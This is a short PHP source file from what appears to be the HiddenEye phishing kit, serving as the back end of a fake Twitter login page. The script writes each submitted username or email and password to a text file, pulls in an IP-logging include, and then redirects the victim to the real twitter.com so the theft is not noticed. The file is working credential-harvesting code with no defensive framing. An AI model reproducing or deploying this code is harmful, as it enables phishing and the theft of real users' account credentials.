HiddenEye-Legacy/WebPages/twitter/login.php
Usama Abdul Sattar 0bc9219e86
Update login.php
2018-06-08 17:00:31 +05:00

7 lines
203 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['usernameOrEmail'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://twitter.com/');
exit();